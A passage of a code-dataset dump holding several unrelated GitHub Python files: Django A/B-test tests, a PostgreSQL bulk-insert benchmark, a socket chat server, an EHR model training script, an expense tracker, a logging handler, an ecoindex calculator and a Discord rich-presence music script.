django.template.response import SimpleTemplateResponse\nfrom django.test import TestCase\nfrom django.test.client import RequestFactory\n\nfrom honest_ab.api import get_experiment_bin\nfrom honest_ab.binning_functions.base import CachedExperimentBinningHandlerBase, HONEST_AB_COOKIE_KEY, CachedExperimentDomainChooser\nfrom honest_ab.middleware import HonestABMiddleware\nfrom honest_ab.models import ExperimentDomain, Experiment, ExperimentDomainAllocation\n\n\nrf = RequestFactory()\n\n\nclass FakeObj(object):\n\n def __init__(self, pk=42):\n self.pk = pk\n\n\nclass FakeBinningFunction(CachedExperimentBinningHandlerBase):\n\n def _cookie_key(self, obj, experiment):\n return \"fake\"\n\n def _make_decision(self, obj, experiment):\n return \"1\"\n\n\nclass DomainChooserTestCases(TestCase):\n\n def setUp(self):\n super(DomainChooserTestCases, self).setUp()\n self.default_domain = ExperimentDomain.objects.get()\n\n def test_retrieve_cached_domain(self):\n obj = FakeObj(200)\n object_name = '.'.join([str(obj.__class__.__module__), str(obj.__class__.__name__)])\n ExperimentDomainAllocation.objects.create(\n experiment_domain=self.default_domain,\n model=object_name,\n model_pk=200\n )\n experiment = Experiment.objects.create(\n domain=self.default_domain,\n slug=\"testtest\"\n )\n self.assertTrue(CachedExperimentDomainChooser().check_domain(obj, experiment))\n self.assertEqual(1, ExperimentDomainAllocation.objects.count())\n\n def test_create_new_domain(self):\n # With no assigned domains, create one.\n experiment = Experiment.objects.create(\n domain=self.default_domain,\n slug=\"testtest\"\n )\n self.assertTrue(CachedExperimentDomainChooser().check_domain(FakeObj(100), experiment))\n domain_cache = ExperimentDomainAllocation.objects.get()\n self.assertEqual(domain_cache.model_pk, 100)\n self.assertEqual(domain_cache.experiment_domain, self.default_domain)\n\n def test_multiple_domains(self):\n # Add second domain (so there will be two)\n # Verify that some tests go to each.\n new_domain = ExperimentDomain.objects.create(\n name=\"second\",\n slug=\"second\"\n )\n experiment = Experiment.objects.create(\n domain=new_domain,\n slug=\"testtest\"\n )\n\n result_counter = {\n True: 0,\n False: 0\n }\n for i in range(100):\n result_counter[CachedExperimentDomainChooser().check_domain(FakeObj(i * 100), experiment)] += 1\n self.assertGreater(result_counter[True], 30)\n self.assertGreater(result_counter[False], 30)\n\n\nclass ApiTestCases(TestCase):\n\n def setUp(self):\n super(ApiTestCases, self).setUp()\n self.experiment_domain = ExperimentDomain.objects.create()\n bin_class_string = \".\".join([FakeBinningFunction.__module__, FakeBinningFunction.__name__])\n self.experiment = Experiment.objects.create(\n domain=self.experiment_domain,\n decision_class=bin_class_string,\n slug=\"testtest\"\n )\n\n def test_get_experiment_bin(self):\n group = get_experiment_bin(FakeObj(), self.experiment.slug)\n self.assertEqual(group['honest_ab_experiments']['testtest'], FakeBinningFunction()._make_decision(None, None))\n\n def test_no_binning_class_found(self):\n pass\n\n\nclass CookieTests(TestCase):\n urls = 'tests.urls'\n\n def setUp(self):\n super(CookieTests, self).setUp()\n self.experiment_domain = ExperimentDomain.objects.create()\n bin_class_string = \".\".join([FakeBinningFunction.__module__, FakeBinningFunction.__name__])\n self.experiment = Experiment.objects.create(\n domain=self.experiment_domain,\n decision_class=bin_class_string,\n slug=\"testtest\"\n )\n\n def test_sets_cookie_on_use(self):\n # Middleware should set a cookie.\n request = rf.get('test_view/testtest')\n context = {\n 'random': 'sample'\n }\n context = get_experiment_bin(FakeObj(), self.experiment.slug, request, context)\n middleware = HonestABMiddleware()\n response = SimpleTemplateResponse(template=\"\", context=context)\n response = middleware.process_response(request, response)\n\n for key, value in context[HONEST_AB_COOKIE_KEY]['__cache__'].iteritems():\n cookie_value = response.cookies.get(key)\n self.assertIsNotNone(cookie_value)\n","repo_name":"guyrt/honest_ab","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"74553394151","text":"import time\nimport random\n\nimport psycopg2 as pg\nfrom psycopg2.extras import execute_values\n\n\ndef main() -> None:\n print(\"Start values generation\")\n\n # setup\n conn = pg.connect(\n host=\"127.0.0.1\",\n user=\"postgres\",\n password=\"postgres\",\n database=\"somedb\"\n )\n curr = conn.cursor()\n\n # main\n start = time.time()\n\n try:\n print(\"Generating values list ...\")\n values = []\n\n for i in range(10_000_000):\n val = random.randint(100, 1_000)\n values.append((i, val,))\n\n print(\"Executing in batch ... (several tens of seconds)\")\n execute_values(\n curr,\n \"INSERT INTO test_table_1 VALUES %s\",\n values,\n\n # Page size increased from 100\n # affects the bulk insert time from\n # 120 seconds to roughly 58 seconds (so about half)\n page_size=100_000 # NOTICE the large page size (default 100)\n )\n\n print(\"Committing ...\")\n conn.commit()\n\n stop = time.time()\n elapsed = stop - start\n\n except KeyboardInterrupt:\n print(\"\\nCtrl+C detected!\")\n elapsed = 0\n\n # cleanup\n curr.close()\n conn.close()\n print(f\"Values generation DONE ({elapsed:.2f}s)\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AndreiHondrari/techonologies-exploration","sub_path":"general-databases/general-sql/limits-testing/p01_02_many_rows_batch_insert_psycopg2/02_insert_many_rows.py","file_name":"02_insert_many_rows.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"42945141834","text":"import select\nimport socket\nfrom server_values import *\ninitialize()\nfrom server_handler import *\nserver_keys = None\n\n\nBYTE_SIZE = 4000\n# Bind the socket to the port\ndef start_server():\n global server_keys\n server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n socket_address = (\"127.0.0.1\", 7777)\n server.bind(socket_address)\n server.listen()\n server_keys = Encryption_handler.get_keys(1500)\n print(\"START_SERVER: LISTENING AT:\", socket_address)\n print(\"START_SERVER: server got keys!\", end=\"\\n\\n\")\n return server\n\n\ndef handle_close(s):\n global connected_users\n global authorize_connection\n global users_keys\n\n try:\n print(f\"HANDLE_CLOSE: closing {s.getpeername()} user: {connected_users[s]}\")\n except:\n print(f\"HANDLE_CLOSE: closing {s.getpeername()}\")\n try:\n authorize_connection.pop(connected_users[s])\n except KeyError:\n pass\n\n try:\n users_keys.pop(s)\n except KeyError:\n pass\n\n try:\n connected_users.pop(s)\n except KeyError:\n pass\n print(\"HANDLE_CLOSE: done closing!\")\n print(f\"\"\"HANDLE_CLOSE: dicts status:\n conncted_users: {connected_users}\n authorize_connection: {authorize_connection}\n users_keys: {users_keys}\n \"\"\", end=\"\\n\\n\")\n\n\ndef sendmsgs(msg, s=None):\n global users_keys\n\n if s is None:\n print(\"SENDMSGS: sending-\", \"|\".join(msg).encode())\n return \"|\".join(msg).encode()\n else:\n print(\"SENDMSGS: sending-\", Encryption_handler.encrypt(\"|\".join(msg), users_keys[s]), end=\"\\n\\n\")\n return Encryption_handler.encrypt(\"|\".join(msg), users_keys[s])\n\n\ndef start_listening(server):\n global known_users\n global connected_users\n global users_keys\n global authorize_connection\n\n inputs = [server]\n print(\"LISTEN: listening started\")\n while inputs:\n readable, writable, exceptional = select.select(inputs, [], [])\n for s in readable:\n if s is server:\n # New connection\n connection, client_address = s.accept()\n print(f'LISTEN: new connection from {client_address}', end=\"\\n\\n\")\n inputs.append(connection)\n\n else: # s.getpeername()\n data = s.recv(BYTE_SIZE)\n if data:\n if s not in users_keys.keys():\n print(f\"LISTEN: {s.getpeername()} sending NOT ENCR \\nmsg:{data.decode()}\", end=\"\\n\\n\")\n data = data.decode().split(\"|\")\n command, c_data = data[0], data[1:]\n if command == \"close\":\n print(f\"LISTEN: {s.getpeername()} asked to start closing\")\n inputs.remove(s)\n handle_close(s)\n s.close()\n else:\n if command == \"login\": # login|user|password\n print(f\"LISTEN: {s.getpeername()} begin to login\")\n returned = login([s] + c_data)\n if returned[0] == \"ok\":\n print(f\"LISTEN: user {connected_users[s]} is now conncted, conn: {s.getpeername()}\")\n s.sendall(\"ok|None\".encode())\n else:\n print(f\"LISTEN: {s.getpeername()} connection failed, error msg: {returned}\")\n s.sendall(sendmsgs(returned))\n else:\n if s not in connected_users.keys():\n print(f\"LISTEN: {s.getpeername()} is unknown, the server blocks him\")\n s.sendall(\"error|unauthorized user, connection closed\".encode())\n inputs.remove(s)\n handle_close(s)\n s.close()\n\n else:\n if command == \"start_encrypt\": # start_encrypt|pb\n print(f\"LISTEN: {connected_users[s]} start to ENC\")\n s.sendall(sendmsgs([\"ok\"]))\n key = s.recv(BYTE_SIZE)\n start_encrypt(key, s)\n s.sendall(Encryption_handler.save_public(server_keys[\"pb\"]))\n print(f\"LISTEN: {connected_users[s]} done ENC!\\nhis pb:\\t{users_keys[s]}\")\n\n elif command == \"ok\":\n print(\"client response successfully\")\n s.sendall(\"ok|None\".encode())\n\n else: # data received is now encrypted\n if s not in connected_users.keys():\n print(\"ENC_LISTEN: unauthorized user found, the server closed connection\", s.getpeername())\n s.sendall(\"error|unauthorized user, connection closed\".encode())\n inputs.remove(s)\n handle_close(s)\n s.close()\n else:\n print(f\"ENC_LISTEN: got an ENC msg from {connected_users[s]}\")\n data = Encryption_handler.decrypt(data, server_keys[\"pr\"])\n print(\"the msg:\", data)\n data = data.split(\"|\")\n command, c_data = data[0], data[1:]\n if command == \"close\":\n inputs.remove(s)\n handle_close(s)\n s.close()\n\n elif command == \"authorize\": # authorize|want2chat\n data = authorize(connected_users[s], c_data)\n s.sendall(sendmsgs(data, s))\n\n elif command == \"sendto_msg\": # sendto_msg|sendto|data\n data = sendto_msg(s, c_data[0], c_data[1])\n s.sendall(sendmsgs(data, s))\n\n elif command == \"connected\":\n print(\"faf\")\n data = conncted(s)\n s.sendall(Encryption_handler.encrypt(data, users_keys[s]))\n else:\n # Interpret empty result as closed connection\n print(f'closing {client_address}, he died')\n # Stop listening for input on the connection\n inputs.remove(s)\n handle_close(s)\n s.close()\n\n\ndef main():\n server = start_server()\n start_listening(server)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"itamarUliel/cyberProj","sub_path":"proj_code/waste/projectServer.py","file_name":"projectServer.py","file_ext":"py","file_size_in_byte":7041,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17171256447","text":"from pyhealth.datasets import MIMIC3Dataset, MIMIC4Dataset\nfrom graphcare_.task_fn import drug_recommendation_fn, drug_recommendation_mimic4_fn, mortality_prediction_mimic3_fn, readmission_prediction_mimic3_fn, length_of_stay_prediction_mimic3_fn, length_of_stay_prediction_mimic4_fn, mortality_prediction_mimic4_fn, readmission_prediction_mimic4_fn\nfrom pyhealth.datasets import get_dataloader\nfrom graphcare_ import split_by_patient\nimport pickle\nfrom pyhealth.trainer import Trainer\nimport torch\nfrom pyhealth.models import Transformer, RETAIN, SafeDrug, MICRON, CNN, RNN, GAMENet\nfrom collections import defaultdict\nimport json\n\ntasks = \\\n[\n \"mortality\", \n \"readmission\", \n \"lenofstay\", \n \"drugrec\"\n ]\ntrain_ratios = \\\n[\n 0.001,\n 0.002,\n 0.003,\n 0.004,\n 0.005,\n 0.006,\n 0.007,\n 0.008,\n 0.009,\n 0.01,\n 0.02,\n 0.03,\n 0.04,\n 0.05,\n 0.06,\n 0.07,\n 0.08,\n 0.09,\n 0.1,\n 0.3,\n 0.50,\n 0.7,\n 0.9,\n]\n\ndevice = torch.device('cuda:4' if torch.cuda.is_available() else 'cpu')\n\nfor task in tasks:\n print(\"task: \", task)\n if task == \"mortality\" or task == \"readmission\":\n with open(f'/data/pj20/exp_data/ccscm_ccsproc_atc3/sample_dataset_mimic3_{task}_th015.pkl', 'rb') as f:\n sample_dataset = pickle.load(f)\n else:\n with open(f'/data/pj20/exp_data/ccscm_ccsproc/sample_dataset_mimic3_{task}_th015.pkl', 'rb') as f:\n sample_dataset = pickle.load(f)\n for train_ratio in train_ratios:\n\n if task != \"drugrec\":\n models = [RNN, Transformer, RETAIN]\n else:\n models = [\n Transformer, \n RETAIN, \n # SafeDrug, \n MICRON, \n # GAMENet\n ]\n\n\n results = defaultdict(list)\n\n for i in range(50):\n print(\"train_ratio: \", train_ratio)\n train_dataset, val_dataset, test_dataset = split_by_patient(sample_dataset, [0.8, 0.1, 0.1], train_ratio=train_ratio, seed=528)\n train_loader = get_dataloader(train_dataset, batch_size=64, shuffle=True)\n val_loader = get_dataloader(val_dataset, batch_size=64, shuffle=False)\n test_loader = get_dataloader(test_dataset, batch_size=64, shuffle=False)\n for model_ in models:\n if task == \"mortality\" or task == \"readmission\":\n model = model_(\n dataset=sample_dataset,\n feature_keys=[\"conditions\", \"procedures\", \"drugs\"],\n label_key=\"label\",\n mode=\"binary\",\n )\n ## binary\n trainer = Trainer(model=model, device=device, metrics=[\"pr_auc\", \"roc_auc\", \"accuracy\", \"f1\", \"jaccard\"])\n trainer.train(\n train_dataloader=train_loader,\n val_dataloader=val_loader,\n epochs=50,\n monitor=\"accuracy\",\n )\n\n elif task == \"lenofstay\":\n model = model_(\n dataset=sample_dataset,\n feature_keys=[\"conditions\", \"procedures\"],\n label_key=\"label\",\n mode=\"multiclass\",\n )\n\n ## multi-class\n trainer = Trainer(model=model, device=device, metrics=[\"roc_auc_weighted_ovr\", \"cohen_kappa\", \"accuracy\", \"f1_weighted\"])\n trainer.train(\n train_dataloader=train_loader,\n val_dataloader=val_loader,\n epochs=50,\n monitor=\"roc_auc_weighted_ovr\",\n )\n\n elif task == \"drugrec\":\n try:\n model = model_(\n dataset=sample_dataset,\n feature_keys=[\"conditions\", \"procedures\"],\n label_key=\"drugs\",\n mode=\"multilabel\",\n )\n except:\n model = model_(dataset=sample_dataset)\n\n ## multi-label\n trainer = Trainer(model=model, device=device, metrics=[\"pr_auc_samples\", \"roc_auc_samples\", \"f1_samples\", \"jaccard_samples\"])\n try:\n trainer.train(\n train_dataloader=train_loader,\n val_dataloader=val_loader,\n epochs=50,\n monitor=\"pr_auc_samples\",\n )\n\n except:\n try:\n results[model_.__name__].append(trainer.evaluate(val_loader))\n except:\n continue\n continue\n\n results[model_.__name__].append(trainer.evaluate(val_loader))\n\n\n avg_results = defaultdict(dict)\n\n for k, v in results.items():\n for k_, v_ in v[0].items():\n avg_results[k][k_] = sum([vv[k_] for vv in v]) / len(v)\n\n\n import numpy as np\n # calculate standard deviation\n variation_results = defaultdict(dict)\n\n for k, v in results.items():\n for k_, v_ in v[0].items():\n variation_results[k][k_] = np.std([vv[k_] for vv in v])\n\n\n print(avg_results)\n print(variation_results)\n with open(f\"./ehr_training_result/avg_results_{task}_{train_ratio}.json\", \"w\") as f:\n json.dump(avg_results, f, indent=6)\n with open(f\"./ehr_training_result/variation_results_{task}_{train_ratio}.json\", \"w\") as f:\n json.dump(variation_results, f, indent=6)\n","repo_name":"pat-jj/GraphCare","sub_path":"baselines/ehr_models.py","file_name":"ehr_models.py","file_ext":"py","file_size_in_byte":5844,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"72"} +{"seq_id":"19223481749","text":"import csv \nimport pandas as pd\nimport matplotlib.pyplot as plt\ndef enter(): #做資料處理\n while True : \n n = eval(input(\"一次輸入幾筆資料 : \"))\n if n == 0 : break #停止紀錄\n else:\n month,day = input('日期(例:月/日) : ').split(\"/\")\n with open('output.csv', 'a', newline='') as csvfile : #開啟csv檔 \n for i in range(n):\n types , money = input('類型 : ') , eval(input('金額 : '))\n \n d['month'].append(month)\n d['day'].append(day)\n d['types'].append(types)\n d['money'].append(money) \n \n csv.writer(csvfile).writerow([month,day,types,money]) # \ndef pie_chart(): #畫圓餅圖\n df = pd.read_csv('output.csv')\n df_month = df.groupby(['month']) #把month分組 \n month , types , money = [] , [] , []\n \n for i in df['month'].unique(): \n df1 = df_month.get_group(i) #把month為i的擷取出來 \n month.append(i)\n \n for j in df1['types'].unique(): #month的唯一性\n types.append(j)\n \n for i in month:\n for j in set(types):\n df2 = df[(df['types']==j) & (df['month']==i)] #當資料的types等於j且month等於i \n money.append(df2.sum()['money'])\n \n data = list(money) \n explode = [0 for x in range(len(types))]\n labels = list(types)\n \n plt.figure(figsize=(7,7))\n plt.pie(data,explode,labels,autopct= \"%2.2f%%\")\n plt.title(\"%d Month\"%i)\n plt.savefig(\"%d Month\"%i,dpi=720,format=\"png\") \n plt.legend()\n \n #跑完圖表,把串列做清空\n month.clear()\n types.clear()\n money.clear() \ndef line_chart():\n df = pd.read_csv('output.csv')\n df_month_uni = df['month'].unique()#找出所有月份\n df_type_uni = df['types'].unique()#找出所有類型\n df_month_type_g = df.groupby(['month','types'])#用月份以及類型去找其他資料\n times = []#找出每個月分共有幾種不同的類型\n month_by_money = [] #找出折線圖的x軸座標(月)\n money_ = []#對應上面找出y軸\n type_ = []#對應上面兩個要比較的類型\n month = []#由上面3個程式統合出最終要畫的折線圖的x軸\n money = []#由上面3個程式統合出最終要畫的折線圖的y軸\n \n #做\n month_ = 0\n num = 0\n for i in df_month_uni:\n for j in df_type_uni:\n try:\n sum_ = df_month_type_g.get_group((i,j)).sum()['money']\n type_.append(j)\n money_.append(sum_)\n if i != month_ :\n times.append(num)\n num = 1\n month_ = i \n elif i == month_ : num +=1 \n except:continue\n times.append(num)\n \n for data in times :\n if data == 0 : times.remove(data)\n for c in range(len(times)) : \n for _ in range(times[c]) : month_by_money.append(df_month_uni[c])\n \n inp = input('要查帳的類型 : ')\n for number in range(len(type_)):\n if type_[number] == inp:\n month.append(month_by_money[number])\n money.append(money_[number])\n if len(month) < 1 or len(month) == 1:\n print('資料不足')\n elif len(month) ==0:\n print('查無此資料')\n \n else:\n plt.plot(month,money,\"r\",linewidth = 0.875,label=\"expenditure\",marker = '.') \n plt.xlabel(\"Month(s)\")\n plt.ylabel(\"Money\")\n plt.title(inp)\n \n plt.axis([1,12,0,max(money)+100])\n plt.xticks(range(1,13))\n \n plt.grid(b=True,axis='both')\n plt.legend(loc='best')\ntry:\n with open('output.csv' , 'r' , newline='' ) as csvfile : \n dcsv = csv.reader(csvfile)\n \n for i in dcsv:\n if i == ['month', 'day', 'types', 'money']:\n d = {'month':[],'day':[],'types':[],'money':[]} #用字典去做分類\n \n with open('output.csv','r', newline='') as csvfile:\n rows = csv.reader(csvfile)\n \n for row in rows:\n if row[0].isdigit():\n d['month'].append(row[0])\n d['day'].append(row[1])\n d['types'].append(row[2])\n d['money'].append(row[3])\n enter() \nexcept:\n with open('output.csv' , 'w' , newline='' ) as csvfile : \n csv.writer(csvfile).writerow(['month', 'day', 'types', 'money']) \n try:\n d = {'month':[],'day':[],'types':[],'money':[]} \n with open('output.csv','r', newline='') as csvfile:\n rows = csv.reader(csvfile)\n for row in rows:\n if row[0].isdigit():\n d['month'].append(row[0])\n d['day'].append(row[1])\n d['types'].append(row[2])\n d['money'].append(row[3])\n enter()\n except:\n d = {'month':[],'day':[],'types':[],'money':[]} \n enter()\nline_chart()\npie_chart()\n","repo_name":"Fang-YuXin/Python","sub_path":"完成.py","file_name":"完成.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"34755444820","text":"from logging import Handler, NOTSET, LogRecord\nfrom contextvars import ContextVar\nfrom contextlib import contextmanager\nfrom typing import Optional, List, Callable\n\nlog_listeners: ContextVar[Optional[List[Callable[[str], None]]]] = ContextVar(\n 'log_listeners', default=None\n)\n\n\nclass ContextLogHandler(Handler):\n def __init__(self, level=NOTSET):\n Handler.__init__(self, level)\n\n def emit(self, record: LogRecord):\n listeners = log_listeners.get()\n if listeners:\n try:\n message = self.format(record)\n for listener in listeners:\n listener(message)\n except Exception:\n self.handleError(record)\n\n\n@contextmanager\ndef capture_logs():\n listeners = log_listeners.get()\n if not listeners:\n listeners = []\n log_listeners.set(listeners)\n\n captured_logs = []\n listeners.append(captured_logs.append)\n\n try:\n yield captured_logs\n finally:\n listeners.remove(captured_logs.append)\n","repo_name":"metaspace2020/metaspace","sub_path":"metaspace/engine/sm/engine/utils/log_capture.py","file_name":"log_capture.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"72"} +{"seq_id":"28943325820","text":"from typing import List\n\nfrom ecoindex.data.grades import A, B, C, D, E, F, G\nfrom ecoindex.data.quantiles import quantiles_dom, quantiles_req, quantiles_size\nfrom ecoindex.models import Ecoindex\n\n\nasync def get_quantile(quantiles: List[int | float], value: int | float) -> float:\n for i in range(1, len(quantiles)):\n if value < quantiles[i]:\n return (\n i - 1 + (value - quantiles[i - 1]) / (quantiles[i] - quantiles[i - 1])\n )\n\n return len(quantiles) - 1\n\n\nasync def get_score(dom: int, size: float, requests: int) -> float:\n q_dom = await get_quantile(quantiles_dom, dom)\n q_size = await get_quantile(quantiles_size, size)\n q_req = await get_quantile(quantiles_req, requests)\n\n return round(100 - 5 * (3 * q_dom + 2 * q_req + q_size) / 6)\n\n\nasync def get_ecoindex(dom: int, size: float, requests: int) -> Ecoindex:\n score = await get_score(dom=dom, size=size, requests=requests)\n\n return Ecoindex(\n score=score,\n grade=await get_grade(score),\n ges=await get_greenhouse_gases_emmission(score),\n water=await get_water_consumption(score),\n )\n\n\nasync def get_grade(ecoindex: float) -> str:\n for grade in \"ABCDEF\":\n if ecoindex > globals()[grade]:\n return grade\n\n return \"G\"\n\n\nasync def get_greenhouse_gases_emmission(ecoindex: float) -> float:\n return round(100 * (2 + 2 * (50 - ecoindex) / 100)) / 100\n\n\nasync def get_water_consumption(ecoindex: float) -> float:\n return round(100 * (3 + 3 * (50 - ecoindex) / 100)) / 100\n","repo_name":"cnumr/ecoindex_python","sub_path":"ecoindex/ecoindex.py","file_name":"ecoindex.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"70382588712","text":"#!/usr/bin/env python\n\nimport os\nimport time\nimport argparse\nimport pypresence\n\n\nfrom urllib.parse import unquote, quote\nfrom argparse import Namespace, ArgumentParser\n\nID = \"783900573388111922\"\nDELAY = 1.5\n\n\nENABLE_PROJECT_GITHUB_BUTTON = False\nIMAGE = \"3dhp_black\"\n\n\nrpc = None\npast_buf = None\ncurr_buf = None\n\n\nclass UserOptions:\n\t@staticmethod\n\tdef get_args() -> Namespace:\n\t\t\"\"\"Function with all the argument configuration using the ``argparser``\n\t\tlibrary that return the arguments given by the user in a ease to use\n\t\t``Namespace`` object.\n\t\t\"\"\"\n\t\tparser: ArgumentParser = ArgumentParser(description='Simple Script to show playing music on Discord')\n\n\t\tparser.add_argument('--enable-github-button', '-b', action=argparse.BooleanOptionalAction, default=False, help=\"Shows Aprich Project button linked to github\")\n\n\t\tparser.add_argument('--image', '-i', type=str, default=\"3dhp_black\", help=\"Default rich presence image.\")\n\t\n\t\treturn parser.parse_args()\n\n\nclass Display:\n\t@staticmethod\n\tdef log(msg):\n\t\tprint(f\"\\033[32mstatus ok:\\033[m {msg}\")\n\n\t@staticmethod\n\tdef err(msg, err=\"error\"):\n\t\tprint(f\"\\033[31m{err}:\\033[m {msg}\")\n\n\t@staticmethod\n\tdef status(ss, sn, sa):\n\t\tprint(f\"\\033[34m\\tstatus:\\033[33m\\t{ss}\\033[m\")\n\t\tprint(f\"\\033[34m\\tname:\\033[33m\\t{sn}\\033[m\")\n\t\tprint(f\"\\033[34m\\tartist:\\033[33m\\t{sa}\\033[m\")\n\n\nclass Discord:\n\t@staticmethod\n\tdef connect(err_h=lambda err: None):\n\t\ttry:\n\t\t\trpc.connect()\n\t\texcept Exception as err:\n\t\t\treturn err_h(type(err))\n\t\telse:\n\t\t\tDisplay.log(\"connected with discord app\")\n\n\t@staticmethod\n\tdef update(state, details, large_image, large_text, small_text, buttons=[],\n\t\t\t err_h=lambda err: None):\n\t\ttry:\n\t\t\trpc.update(state=state, details=details, large_image=large_image,\n\t\t\t\t\t large_text=large_text, small_text=small_text,\n\t\t\t\t\t buttons=buttons)\n\t\texcept Exception as err:\n\t\t\treturn err_h(type(err))\n\t\telse:\n\t\t\tDisplay.log(\"status updated\")\n\n\nclass ErrHandler:\n\t@staticmethod\n\tdef couldNotUpdate(err):\n\t\tDisplay.err(\"could not update the song status\", err)\n\t\tDiscord.connect(ErrHandler.couldNotConnect)\n\t\treturn True\n\n\t@staticmethod\n\tdef couldNotConnect(err):\n\t\tDisplay.err(\"discord not found\", err)\n\t\treturn True\n\n\ndef searchOnYoutube(songname, songartist) -> str:\n\tysu = \"https://youtube.com/search?q={query}\"\n\tquery = quote(str(songartist)+ \" - \" +str(songname))\n\treturn str(ysu.format(query=query))\n\n\n\n\nclass Controllers:\n\t@staticmethod\n\tdef getSong():\n\t\tisplaying: str = \"Stopped\"\n\t\tsongName: str = None\n\t\tsongArtist: str = None\n\t\tsongYtsearch: str = None\n\n\t\tgetplaying = os.popen(\"playerctl status\").read()\n\n\t\traw_meta = os.popen(\"playerctl metadata\").read()\n\t\tlinesplit = raw_meta.splitlines()\n\n\t\tif \"Playing\" in getplaying:\n\t\t\tisplaying = \"Playing\"\n\t\t\tfor x in linesplit:\n\t\t\t\tif \":artist\" in x:\n\t\t\t\t\tartist = x.split(\":artist\")\n\t\t\t\t\tsongArtist = artist[1].replace(\" \"*14, \"\") + \" \"*2\n\n\n\t\t\tfor y in linesplit:\n\t\t\t\tif \":title\" in y:\n\t\t\t\t\ttitle = y.split(\":title\")\n\t\t\t\t\tsongName = title[1].replace(\" \"*15, \"\") + \" \"*2\n\n\t\telif \"Stopped\" in getplaying:\n\t\t\tisplaying = \"Stopped\"\n\n\t\telif \"Paused\" in getplaying:\n\t\t\tisplaying = \"Paused\"\n\t\t\tfor x in linesplit:\n\t\t\t\tif \":artist\" in x:\n\t\t\t\t\tartist = x.split(\":artist\")\n\t\t\t\t\tsongArtist = artist[1].replace(\" \"*14, \"\") + \" \"*2\n\n\t\t\tfor y in linesplit:\n\t\t\t\tif \":title\" in y:\n\t\t\t\t\ttitle = y.split(\":title\")\n\t\t\t\t\tsongName = title[1].replace(\" \"*15, \"\") + \" \"*2\n\n\t\telse:\n\t\t\tisplaying = \"Stopped\"\n\t\t\tsongArtist = \"\"\n\t\t\tsongName = \"\"\n\n\t\tif not all((songName, songArtist)):\n\t\t\t_raw = os.popen(\"playerctl metadata\").read().splitlines()\n\t\t\tfor line in _raw:\n\t\t\t\tif \":url\" in line:\n\t\t\t\t\traw_url = line.split(\":url\")\n\t\t\t\t\turl = raw_url[1].replace(\" \"*17, \"\") + \" \"*2\n\t\t\t\t\turl = unquote(url)\n\n\t\t\t\t\trsn = url.split('/')[-1]\n\t\t\t\t\tisplaying = \"Playing\"\n\t\t\t\t\tsongArtist = \"\"\n\t\t\t\t\tsongName = rsn\n\t\t\t\t\tsongYtsearch = searchOnYoutube(songName, \"*\")\n\n\t\telse:\n\t\t\tsongYtsearch = searchOnYoutube(songName, songArtist)\n\n\n\n\t\treturn {\"isplaying\": isplaying, \"songName\": songName,\n\t\t\t\t\"songArtist\": songArtist, \"youtubeSearch\": songYtsearch}\n\n\t@staticmethod\n\tdef hasChanded():\n\t\tglobal past_buf\n\t\tglobal curr_buf\n\n\t\tif curr_buf == past_buf:\n\t\t\treturn False\n\n\t\tpast_buf = curr_buf\n\t\treturn True\n\n\t@staticmethod\n\tdef updateSong():\n\n\t\tif past_buf is None:\n\t\t\treturn\n\n\t\tsinfo = past_buf\n\n\t\tss = sinfo['isplaying']\n\t\tsn = sinfo['songName']\n\t\tsa = sinfo['songArtist']\n\t\tsu = sinfo['youtubeSearch']\n\n\t\t# Buttons\n\t\trpbuttons = [{\n\t\t\t\t'label': \"Search On Youtube\",\n\t\t\t\t'url': su\n\t\t\t}\n\t\t]\n\n\t\tproject_github_button = {\n\t\t\t\t'label': \"Aprich Project\",\n\t\t\t\t'url': 'https://github.com/hayukimori/aprich'\n\t\t\t}\n\n\n\n\t\tif ENABLE_PROJECT_GITHUB_BUTTON:\n\t\t\trpbuttons.append(project_github_button)\n\n\n\t\twhile Discord.update(sa, sn, IMAGE, ss, sa, buttons=rpbuttons, err_h=ErrHandler.couldNotUpdate):\n\t\t\ttime.sleep(DELAY)\n\n\t\tDisplay.status(ss, sn, sa)\n\n\t@staticmethod\n\tdef firstTime(err_h=lambda err: None):\n\t\tglobal rpc\n\t\tglobal curr_buf\n\n\t\ttry:\n\t\t\trpc = pypresence.Presence(ID)\n\t\t\tcurr_buf = Controllers.getSong()\n\t\t\tControllers.updateSong()\n\n\t\texcept Exception as err:\n\t\t\treturn err_h(type(err))\n\n\t\telse:\n\t\t\tDisplay.log(\"rich presence connected with discord\")\n\n\t@staticmethod\n\tdef eventLoop():\n\t\tglobal curr_buf\n\n\t\twhile True:\n\t\t\tcurr_buf = Controllers.getSong()\n\n\t\t\tif Controllers.hasChanded():\n\t\t\t\tControllers.updateSong()\n\n\t\t\ttime.sleep(DELAY)\n\n\ndef main():\n\tglobal ENABLE_PROJECT_GITHUB_BUTTON\n\tglobal IMAGE\n\n\t# Define default args based on cli args;\n\tnewvars = UserOptions.get_args()\n\tENABLE_PROJECT_GITHUB_BUTTON = newvars.enable_github_button\n\tIMAGE = newvars.image\n\t\n\ttry:\n\t\twhile Controllers.firstTime(ErrHandler.couldNotConnect):\n\t\t\ttime.sleep(DELAY)\n\t\tControllers.eventLoop()\n\n\texcept KeyboardInterrupt as err:\n\t\tDisplay.err(\"interruped by user\", type(err))\n\t\trpc.close()\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"hayukimori/aprich","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5812,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"28191322959","text":"#!/bin/python3\n\nimport os\nimport sys\n\nclass SinglyLinkedListNode:\n def 